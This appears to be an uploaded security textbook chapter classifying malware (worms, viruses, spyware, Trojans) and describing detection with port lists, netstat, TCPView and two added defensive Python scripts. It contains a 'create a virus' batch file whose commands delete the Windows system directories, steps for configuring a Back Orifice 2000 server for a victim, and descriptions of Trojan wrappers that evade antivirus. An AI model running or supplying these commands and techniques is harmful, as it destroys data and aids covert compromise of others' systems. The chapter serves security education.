Hacking CH02... · Web view


Upload: doannhi

Post on 30-Jul-2019



Chapter 2 - Types of malware

2.1 Worms

A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. On November 2, 1988, Robert Tappan Morris, a Cornell University computer science graduate student, unleashed what became known as the Morris worm, disrupting a large number of computers then on the Internet, guessed at the time to be one tenth of all those connected.

Often, a worm uses a computer network to spread itself, relying on security failures on the target computer to access it. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

2.1.1 The Functioning of Computer Worms

One of the main characteristics of worms is their inherent ability to replicate and spread across networks extremely quickly. Most worms share certain features that help define how they work and what they can do:

o Do not require a host application to perform their activities.
o Do not necessarily require any user interaction, direct or otherwise, to function.
o Replicate extremely rapidly across networks and hosts.
o Consume bandwidth and resources.

Worms can also perform some other functions:

o Transmit information from a victim system back to another location specified by the designer.
o Carry a payload, such as a virus, and drop off this payload on multiple systems rapidly.

With these abilities in mind, it is important to distinguish worms from viruses by considering a couple of key points:

o A worm can be considered a special type of malware that can replicate and consume memory, but at the same time it does not typically attach itself to other applications or software.
o A worm spreads through infected networks automatically and requires only that a host is vulnerable.
o A virus does not have this ability.

2.2 Viruses

A computer virus is a piece of software that can “infect” other programs by modifying them. A virus carries in its instructional code the recipe for making perfect copies of itself. A computer virus has three parts:

o Infection mechanism: The means by which a virus spreads, enabling it to replicate. The mechanism is also referred to as the infection vector.
o Trigger: The event or condition that determines when the payload is activated or delivered.
o Payload: What the virus does, besides spreading. The payload may involve damage or may involve benign but noticeable activity. Many potential actions can take place, such as these:
  o Altering data
  o Infecting other programs
  o Replicating
  o Encrypting itself
  o Transforming itself into another form
  o Altering configuration settings
  o Destroying data
  o Corrupting or destroying hardware

2.2.1 Four Phases

Dormant phase: The virus is idle. The virus will eventually be activated by some event, such as a date, the presence of another program or file, or the capacity of the disk exceeding some limit. Not all viruses have this stage.

Propagation phase: The virus places a copy of itself into other programs or into certain system areas on the disk. The copy may not be identical to the propagating version; viruses often morph to evade detection. Each infected program will now contain a clone of the virus, which will itself enter a propagation phase.

Triggering phase: The virus is activated to perform the function for which it was intended. As with the dormant phase, the triggering phase can be caused by a variety of system events, including a count of the number of times that this copy of the virus has made copies of itself.

Execution phase: The function is performed. The function may be harmless, such as a message on the screen, or damaging, such as the destruction of programs and data files.

2.2.2 The Process of Developing a Virus

1. Design—The author envisions and creates the virus. The author may choose to create the virus completely from scratch or use one of the many construction kits that are available to create the virus of their choice.

2. Replication—Once deployed, the new virus spreads through replication: multiplying and then ultimately spreading to different systems. How this process takes place depends on the author’s original intent, but the process can be very rapid, with new systems becoming infected in short order.

3. Launch—The virus starts to do its dirty work by carrying out the task for which it was created (such as destroying data or changing a system’s settings). Once the virus activates through a user action or other predetermined action, the infection begins.

4. Detection—The virus is recognized as such after infecting systems for some period of time. During this phase, the nature of the infection is typically reported to antivirus makers, who begin their initial research into how the software works and how to eradicate it.

5. Incorporation—The antivirus makers determine a way to identify the virus and incorporate the process into their products through updates. Typically, the newly identified malware is incorporated into signature files, which are downloaded and installed by the antivirus application.

6. Elimination—Users of the antivirus products incorporate the updates into their systems and eliminate the virus.

NOTE: It is important to realize that this process is not linear: it is a loop or cycle. When step 6 is reached, the whole process starts over at step 1 with another round of virus development.

2.2.3 Kinds of Viruses

System or boot sector virus –
o It is designed to infect and place its own code into the master boot record (MBR) of a system.
o Once this infection takes place, the system’s boot sequence is effectively altered, meaning the virus or other code can be loaded before the system itself.
o Post-infection symptoms such as startup problems, problems with retrieving data, computer performance instability, and the inability to locate hard drives are all issues that may arise.

Macro viruses –
o They take advantage of embedded languages such as Visual Basic for Applications (VBA).
o In applications such as Microsoft Excel and Word, these macro languages are designed to automate functions and create new processes.
o The problem with these languages is that they lend themselves very effectively to abuse; in addition, they can easily be embedded into template files and regular document files.
o Once the macro is run on a victim’s system, it can do all sorts of things, such as change a system configuration to decrease security or read a user’s address book and email to others (which happened in some early cases).
o A prime example of this type of virus is the Melissa virus of the late 1990s.

Cluster viruses –
o They are another variation of the family tree that carries out its dirty work in yet another original way.
o This virus alters the file-allocation tables on a storage device, causing file entries to point to the virus instead of the real file.
o In practice, this means that when a user runs a given application, the virus runs before the system executes the actual file.
o Making this type of virus even more dangerous is the fact that infected drive-repair utilities cause problems of an even more widespread variety.
o Utilities such as ScanDisk may even destroy sections of the drive or eliminate files.

Stealth or tunneling virus –

o It is designed to employ various mechanisms to evade detection systems.
o Stealth viruses employ unique techniques including intercepting calls from the OS and returning bogus or invalid responses that are designed to fool or mislead.

Encryption viruses –
o They can scramble themselves to avoid detection.
o This virus changes its program code, making it nearly impossible to detect using normal means.
o It uses an encryption algorithm to encrypt and decrypt the virus multiple times as it replicates and infects.
o Each time the infection process occurs, a new encryption sequence takes place with different settings, making it difficult for antivirus software to detect the problem.

Cavity or file-overwriting viruses –
o They hide in a host file without changing the host file’s appearance, so detection becomes difficult.
o Many viruses that do this also implement stealth techniques, so you don’t see the increase in file length when the virus code is active in memory.

Sparse-infector viruses –
o They avoid detection by carrying out their infectious actions only sporadically, such as on every 10th or 25th activation.
o A virus may even be set up to infect only files of a certain length or type or that start with a certain letter.

Companion or camouflage virus –
o It compromises a feature of OSs that enables software with the same name, but different extensions, to operate with different priorities.
o For example, you may have program.exe on your computer, and the virus may create a file called program.com.
o When the computer executes program.exe, the virus runs program.com before program.exe is executed.
o In many cases, the real program runs, so users believe the system is operating normally and aren’t aware that a virus was run on the system.
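A defender-side check for the .com/.exe name collision described above, added here as an example (it is not part of the original chapter). It generalises the program.com/program.exe case to the whole extension search order, which is assumed to be the Windows default PATHEXT order; the directory listing it runs over is constructed.

```python
"""List executable stems present with more than one extension, and which file the
command interpreter resolves first when the bare name is typed (the companion trick)."""
import os
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Assumed default Windows PATHEXT order (earliest entry wins). On a real host,
# read os.environ["PATHEXT"] instead of relying on this constant.
DEFAULT_PATHEXT = [".COM", ".EXE", ".BAT", ".CMD"]


def companion_candidates(filenames: Iterable[str],
                         pathext: List[str] = DEFAULT_PATHEXT
                         ) -> List[Tuple[str, str, List[str]]]:
    """Return (stem, winner, shadowed) for every stem with more than one executable
    extension. 'winner' is the file resolved first in PATHEXT order; 'shadowed' are
    the rest, e.g. program.com shadowing program.exe. A legitimate .bat wrapper next
    to an .exe shows up too, so each finding is something to verify, not a verdict."""
    rank = {ext.upper(): i for i, ext in enumerate(pathext)}
    by_stem: Dict[str, List[str]] = defaultdict(list)
    for name in filenames:
        stem, ext = os.path.splitext(name)
        if ext.upper() in rank:                 # ignore non-executable files
            by_stem[stem.lower()].append(name)  # Windows names are case-insensitive
    findings = []
    for stem, names in sorted(by_stem.items()):
        if len(names) < 2:
            continue
        names.sort(key=lambda n: rank[os.path.splitext(n)[1].upper()])
        findings.append((stem, names[0], names[1:]))
    return findings


def scan_directory(path: str) -> List[Tuple[str, str, List[str]]]:
    """Run the check over one directory (entries on PATH are the usual targets)."""
    return companion_candidates(os.listdir(path))


# Constructed listing (not taken from a real system): program.com has been dropped
# next to program.exe, so typing 'program' runs the .com first.
SAMPLE_LISTING = ["program.exe", "program.com", "setup.exe", "Notepad.EXE",
                  "notepad.bat", "readme.txt"]

if __name__ == "__main__":
    for stem, winner, shadowed in companion_candidates(SAMPLE_LISTING):
        print(f"{stem}: {winner} runs first, shadowing {', '.join(shadowed)}")
```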

Logic bomb –
o It is designed to lie in wait until a predetermined event or action occurs.
o When this event occurs, the bomb or payload detonates and carries out its intended or designed action.
o Logic bombs have been notoriously difficult to detect because they do not look harmful until they are activated—and by then, it may be too late.
o In many cases, the bomb is separated into two parts: the payload and the trigger.
o Neither looks all that dangerous until the predetermined event occurs.

File or multipartite viruses –
o They infect systems in multiple ways using multiple attack vectors, hence the term multipartite.
o Attack targets include the boot sector and executable files on the hard drive.
o What makes such viruses dangerous and powerful weapons is that to stop them, you must remove all of their parts.
o If any part of the virus is not eradicated from the infected system, it can reinfect the system.

Shell viruses –
o They are another type of virus where the software infects the target application and alters it.
o The virus makes the infected program into a subroutine that runs after the virus itself runs.

Cryptoviruses –
o They hunt for files or certain types of data on a system and then encrypt it.
o Then the victim is instructed to contact the virus creator via a special email address or other means and pay a specified amount (ransom) for the key to unlock the files.

Hoax –
o It is not a true virus in the sense of the others discussed here, but we need to cover this topic because a hoax can be just as powerful and devastating as a virus.
o Hoaxes are designed to make the user take action even though no infection or threat exists.

2.2.4 Create a Virus

Method 1: Creating a Simple Virus

So, let’s write a simple virus. You need access to Notepad and bat2com, the latter of which you can find on the Internet.

Before you get started, here’s a warning: Do not execute this virus. This exercise is meant to be a proof of concept and for illustrative purposes only. Executing this code on your system could result in damage to your system that may require extensive time and skill to fix properly. With that said, follow these steps:

1. Create a batch file called virus.bat using Windows Notepad.
2. Enter the following lines of code:

@echo off
Del c:\windows\system32\*.*
Del c:\windows\*.*

3. Save virus.bat.
4. From the command prompt, use bat2com to convert virus.bat into virus.com.

Method 2: Another way to create a virus is to use a utility such as JPS Virus Maker. It is a simple utility in which you pick options from a GUI and then choose to create a new executable file that can be used to infect a host. Figure 8.1 shows the interface for JPS Virus Maker.

2.2.5 Researching Viruses

If you need to investigate and analyze malware in addition to defending against it, you should know about a mechanism known as a sheep-dip system. A sheep-dip system is a computer that is specifically configured to analyze files. The system typically is stripped down and includes only those services and applications needed to test software to ascertain whether it is safe.

2.3 Spyware

Spyware is a type of malware that is designed to collect and forward information regarding a victim’s activities to an interested party. The application acts behind the scenes to gather this information without the user’s consent or knowledge. The information gathered by spyware can be anything that the creator of the spyware feels is worthwhile. Spyware has been used to target ads, steal identities, generate revenue, alter systems, and capture other information.

2.3.1 Methods of Spyware Infection

Peer-to-Peer Networks (P2P)
o This delivery mechanism has become very popular because of the increased number of individuals using these networks to obtain free software.

Instant Messaging (IM)
o Delivering malicious software via IM is easy.
o IM software has never had much in the way of security controls.

Internet Relay Chat (IRC)
o IRC is a commonly used mechanism to deliver messages and software because of its widespread use and the ability to entice new users to download software.

Email Attachments
o With the rise of email as a communication medium, the practice of using it to distribute malware has also risen.

Physical Access
o Once an attacker gains physical access, it becomes relatively easy to install spyware and compromise the system.

Browser Defects
o Many users forget or do not choose to update their browsers as soon as updates are released, so distribution of spyware becomes easier.

Freeware
o Downloading software for free from unknown or untrusted sources can mean that you also download something nastier, such as spyware.

Websites
o Software is sometimes installed on a system via web browsing. When a user visits a given website, spyware may be downloaded and installed using scripting or some other means.

Software Installations
o One common way to install software such as spyware on a victim’s system is as part of another software installation.
o In these situations, a victim downloads a piece of software that they want, but packaged with it is a payload that is silently installed in the background.
o The victim may be told that something else is being installed on the system but may click through the installation wizard so quickly without reading anything that they miss the fact that additional software is being placed on their system.

2.4 Trojans

One of the older and potentially widely misunderstood forms of malware is the Trojan. A Trojan is a software application that is designed to provide covert access to a victim’s system. The malicious code is packaged in such a way that it appears harmless and thus gets around both the scrutiny of the user and the antivirus or other applications that are looking for malware. Once on a system, its goals are similar to those of a virus or worm: to get and maintain control of the system or perform some other task. A Trojan relies on these items:

o An overt channel is a communication path or channel that is used to send information or perform other actions. HTTP and TCP/IP are examples of communication mechanisms that can and do send information legitimately.
o A covert channel is a path that is used to transmit or convey information but does so in a way that is illegitimate or supposed to be impossible but is able to circumvent security. The covert channel violates security policy on a system.

2.4.1 Trojan Behaviors

o The CD drawer of a computer opens and closes.
o The computer screen changes, either flipping or inverting.
o Screen settings change by themselves.
o Documents print with no explanation.
o The browser is redirected to a strange or unknown web page.
o The Windows color settings change.
o Screen saver settings change.
o The right and left mouse buttons reverse their functions.
o The mouse pointer disappears.
o The mouse pointer moves in unexplained ways.
o The Start button disappears.
o Chat boxes appear.
o The Internet service provider (ISP) reports that the victim’s computer is running port scans.
o People chatting with you appear to know detailed personal information about you.
o The system shuts down by itself.
o The taskbar disappears.
o Account passwords are changed.
o Legitimate accounts are accessed without authorization.
o Unknown purchase statements appear on credit card bills.
o Modems dial and connect to the Internet by themselves.
o Ctrl+Alt+Del stops working.

2.4.2 Operations that could be performed by a hacker on a target computer system include these:

o Stealing data
o Installing software
o Downloading or uploading files
o Modifying files
o Installing keyloggers
o Viewing the system user’s screen
o Consuming computer storage space
o Crashing the victim’s system

2.4.3 Types of Trojans include the following:

Remote Access Trojans (RATs)
o Designed to give an attacker remote control over a victim’s system.

Data Sending
o To fit into this category, a Trojan must capture some sort of data from the victim’s system, including files and keystrokes.
o Once captured, this data can be transmitted via email or other means if the Trojan is so enabled.
o Keyloggers are common Trojans of this type.

Destructive
o This type of Trojan seeks to corrupt, erase, or destroy data outright on a system.
o In more extreme cases, the Trojan may affect the hardware in such a way that it becomes unusable.

Proxy
o Malware of this type causes a system to be used as a proxy by the attacker.
o The attacker uses the victim’s system to scan or access another system or location.
o The result is that the actual attacker is hard to find.

FTP
o Software in this category is designed to set up the infected system as an FTP server.
o An infected system becomes a server hosting all sorts of information, which may include illegal content of all types.

Security Software Disablers
o A Trojan can be used as the first step in further attacks if it is used to disable security software.

2.4.4 Detecting Trojans and Viruses

A Trojan can be detected in many ways. Port scanning can prove very effective if you know what to look for. Because a Trojan is used to allow access through backdoors or covert channels, a port must be opened to allow this communication. A port scan using a tool such as Nmap reveals these ports and allows you to investigate them further.

The following ports are used for classic Trojans:

Back Orifice—UDP 31337 or 31338
Back Orifice 2000—TCP/UDP 54320/54321
Beast—TCP 6666
Citrix ICA—TCP/UDP 1494
Deep Throat—UDP 2140 and 3150
Desktop Control—UDP NA
Loki—Internet Control Message Protocol (ICMP)
NetBus—TCP 12345 and 12346
Netcat—TCP/UDP (any)
NetMeeting Remote—TCP 49608/49609
pcAnywhere—TCP 5631/5632/65301
Reachout—TCP 43188
Remotely Anywhere—TCP 2000/2001
Remote—TCP/UDP 135-1139
Whack-a-Mole—TCP 12361 and 12362
NetBus 2 Pro—TCP 20034
GirlFriend—TCP 21544
Masters Paradise—TCP 3129, 40421, 40422, 40423, and 40426
Timbuktu—TCP/UDP 407
VNC—TCP/UDP 5800/5801

2.4.5 Detecting Trojans and Viruses

Method 1 - Using Netstat to Detect Open Ports

This tool can list the ports that are open and listening for connections on the system. To use netstat, follow these steps in Windows:

1. Open a command prompt.
2. At the command line, enter netstat -an (note that the command is case sensitive).
3. Observe the results.

You should see that several ports are open and listening. You may not recognize all the numbers, but that doesn’t mean they are malicious. You may wish to research the open ports (they vary from system to system) to see what each relates to.
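The classic-port table in 2.4.4 and the netstat procedure above can be combined into a repeatable check. The following Python script is an added example, not part of the original chapter: it parses Windows netstat -an output (the sample output embedded here is constructed, not captured from a real host) and flags bound sockets that sit on the chapter's port list, treating each hit as a lead to investigate rather than a verdict.

```python
"""Flag sockets from 'netstat -an' output that sit on the chapter's classic Trojan ports."""
from typing import Dict, List, NamedTuple, Tuple

# Port table as given in the chapter (only entries with concrete port numbers).
CLASSIC_PORTS: Dict[Tuple[str, int], str] = {}


def _add(name: str, protos: str, *ports: int) -> None:
    for proto in protos.split("/"):
        for port in ports:
            CLASSIC_PORTS[(proto, port)] = name


_add("Back Orifice", "UDP", 31337, 31338)
_add("Back Orifice 2000", "TCP/UDP", 54320, 54321)
_add("Beast", "TCP", 6666)
_add("Citrix ICA", "TCP/UDP", 1494)
_add("Deep Throat", "UDP", 2140, 3150)
_add("NetBus", "TCP", 12345, 12346)
_add("NetMeeting Remote", "TCP", 49608, 49609)
_add("pcAnywhere", "TCP", 5631, 5632, 65301)
_add("Reachout", "TCP", 43188)
_add("Remotely Anywhere", "TCP", 2000, 2001)
_add("Whack-a-Mole", "TCP", 12361, 12362)
_add("NetBus 2 Pro", "TCP", 20034)
_add("GirlFriend", "TCP", 21544)
_add("Masters Paradise", "TCP", 3129, 40421, 40422, 40423, 40426)
_add("Timbuktu", "TCP/UDP", 407)
_add("VNC", "TCP/UDP", 5800, 5801)


class Socket(NamedTuple):
    proto: str
    local_addr: str
    port: int
    state: str  # LISTENING, ESTABLISHED, ... for TCP; "" for UDP (no state)


class Hit(NamedTuple):
    socket: Socket
    name: str


def parse_netstat(text: str) -> List[Socket]:
    """Parse the socket lines of Windows 'netstat -an' output, skipping the banner."""
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue  # banner, column header, blank line
        host, _, port = parts[1].rpartition(":")  # also handles [::]:5800
        if not port.isdigit():
            continue
        state = parts[3] if parts[0] == "TCP" and len(parts) > 3 else ""
        sockets.append(Socket(parts[0], host, int(port), state))
    return sockets


def find_classic_trojan_ports(text: str) -> List[Hit]:
    """Return sockets bound to a port from the chapter's list.
    TCP sockets count only when LISTENING (an inbound backdoor must listen); UDP has
    no state, so any bound UDP socket on a listed port counts. Several listed ports
    also belong to legitimate remote-control software, so confirm the owning process
    (netstat -anob, or TCPView) before calling a hit malicious."""
    hits = []
    for s in parse_netstat(text):
        if s.proto == "TCP" and s.state != "LISTENING":
            continue
        name = CLASSIC_PORTS.get((s.proto, s.port))
        if name:
            hits.append(Hit(s, name))
    return hits


# Constructed sample output (not captured from a real system).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.5:6666       203.0.113.9:51111      ESTABLISHED
  TCP    [::]:5800              [::]:0                 LISTENING
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:500            *:*
"""

if __name__ == "__main__":
    for hit in find_classic_trojan_ports(SAMPLE):
        s = hit.socket
        print(f"{s.proto} {s.local_addr}:{s.port} {s.state} -> {hit.name}")
```

To run it against a live Windows host, pipe the real output in: netstat -an > ports.txt and pass the file contents to find_classic_trojan_ports.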

Method 2 - Using TCPView to Track Port Usage

Netstat is a powerful tool, but one of its shortcomings is the fact that it is not real time. TCPView tracks port usage in real time; you can download it from www.microsoft.com. To use TCPView, follow these steps:

1. In Windows, run the tcpview.exe executable.
2. Observe the results in the GUI.
3. With TCPView still running, open a web browser, and go to www.wiley.com.
4. In TCPView, notice the results and that new entries have been added.
5. In the browser, go to www.youtube.com (or some other site that streams video or audio), and play a video or piece of content.
6. In TCPView, watch how the entries change as ports are opened and closed. Observe for a minute or two, and note how the display updates.
7. Close the web browser.
8. In TCPView, observe how the display updates as some connections and applications are removed.

2.4.6 Tools for Creating Trojans

Let Me Rule
o A remote access Trojan authored entirely in Delphi. It uses TCP port 26097 by default.

RECUB
o Remote Encrypted Callback Unix Backdoor (RECUB) features RC4 encryption, code injection, and encrypted ICMP communication requests. It demonstrates a key trait of Trojan software—small size—as it tips the scale at less than 6 KB.

Phatbot
o Capable of stealing personal information including email addresses, credit card numbers, and software licensing codes. It returns this information to the attacker or requestor using a P2P network. Phatbot can also terminate many antivirus and software-based firewall products, leaving the victim open to secondary attacks.

Amitis
o Opens TCP port 27551 to give the hacker complete control over the victim’s computer.

Zombam.B
o Allows the attacker to use a web browser to infect a computer. It uses port 80 by default and is created with a Trojan-generation tool known as HTTPRat. Much like Phatbot, it also attempts to terminate various antivirus and firewall processes.

Beast
o Uses a technique known as dynamic-link library (DLL) injection to inject itself into an existing process, effectively hiding itself from process viewers.

Hard-Disk Killer
o A Trojan written to destroy a system’s hard drive. When executed, it attacks a system’s hard drive and wipes it in just a few seconds.

Back Orifice 2000 (BO2K)
o BO2K is a lot like other major file synchronization and remote control packages that are on the market as commercial products, except that BO2K is smaller, faster, free, and very, very extensible.

BO2K consists of two software components: a client and a server. To use the BO2K server, the configuration is as follows:

1. Start the BO2K Wizard, and click Next when the wizard’s splash screen appears.
2. When prompted by the wizard, enter the server executable to be edited.
3. Choose the protocol over which to run the server communication. The typical choice is to use TCP as the protocol, due to its inherent robustness. UDP is typically used if a firewall or other security architecture needs to be traversed.
4. The next screen asks what port number will be used. Port 80 is generally open, and so it’s most often used, but you can use any open port.
5. In the next screen, enter a password that will be used to access the server. Note that passwords can be used, but you can also choose open authentication—that means anyone can gain access without having to supply credentials of any kind.
6. When the wizard finishes, the server-configuration tool is provided with the information you entered.
7. The server can be configured to start when the system starts up. This allows the program to restart every time the system is rebooted, preventing the program from becoming unavailable.
8. Click Save Server to save the changes and commit them to the server.

Once the server is configured, it is ready to be installed on the victim’s system. BO2K’s list of features:

1. Address book–style server list
2. Functionality that can be extended via the use of plug-ins
3. Multiple simultaneous server connections
4. Session-logging capability
5. Native server support
6. Keylogging capability
7. Hypertext Transfer Protocol (HTTP) file system browsing and transfer
8. Microsoft Networking file sharing
9. Remote registry editing
10. File browsing, transfer, and management
11. Plug-in extensibility
12. Remote upgrading, installation, and uninstallation
13. Network redirection of Transmission Control Protocol/Internet Protocol (TCP/IP) connections
14. Ability to access console programs such as command shells through Telnet
15. Multimedia support for audio/video capture and audio playback
16. Windows NT registry passwords and Win9x screen saver password dumping
17. Process control, start, stop, and list
18. Multiple client connections over any medium
19. GUI message prompts

2.4.7 Distributing Trojans

Using Wrappers to Install Trojans

Using wrappers, attackers can take their intended payload and merge it with a harmless executable to create a single executable from the two. Examples of wrapper programs are the following:

1. EliteWrap –
a. It includes the ability to perform redundancy checks on merged files to make sure the process went properly and the ability to check if the software will install as expected.
b. The software can be configured to the point of letting the attacker choose an installation directory for the payload.
c. Software wrapped with EliteWrap can be configured to install silently without any user interaction.

2. Saran Wrap –
a. It is specifically designed to work with and hide Back Orifice.
b. It can bundle Back Orifice with an existing program into what appears to be a standard program using Install Shield.

3. Trojan Man –
a. It merges programs and can encrypt the new package in order to bypass antivirus programs.

4. Teflon Oil Patch –
a. It is designed to bind Trojans to a specified file in order to defeat Trojan-detection applications.

5. Restorator –
a. It was designed with the best of intentions but is now used for less-than-honorable purposes.
b. It can add a payload to, for example, a seemingly harmless screen saver, before it is forwarded to the victim.

6. Firekiller 2000 –
a. It is designed to be used with other applications when wrapped.
b. This application disables firewall and antivirus software.
c. Programs such as Norton Antivirus and McAfee VirusScan were vulnerable targets prior to being patched.

2.4.8 Trojan Construction Kits

1. Trojan Construction Kit
One of the best examples of a relatively easy-to-use but potentially destructive tool. This kit is command-line based, which may make it a little less accessible to the average person, but it is nonetheless very capable in the right hands. With a little effort, it is possible to build a Trojan that can engage in destructive behavior such as destroying partition tables, master boot records (MBRs), and hard drives.

2. Senna Spy
Another Trojan-creation kit that provides custom options, such as file transfer, executing DOS commands, keyboard control, and listing and controlling processes.

3. Stealth Tool
A program used not to create Trojans but to assist them in hiding. In practice, this tool is used to alter the target file by moving bytes, changing headers, splitting files, and combining files.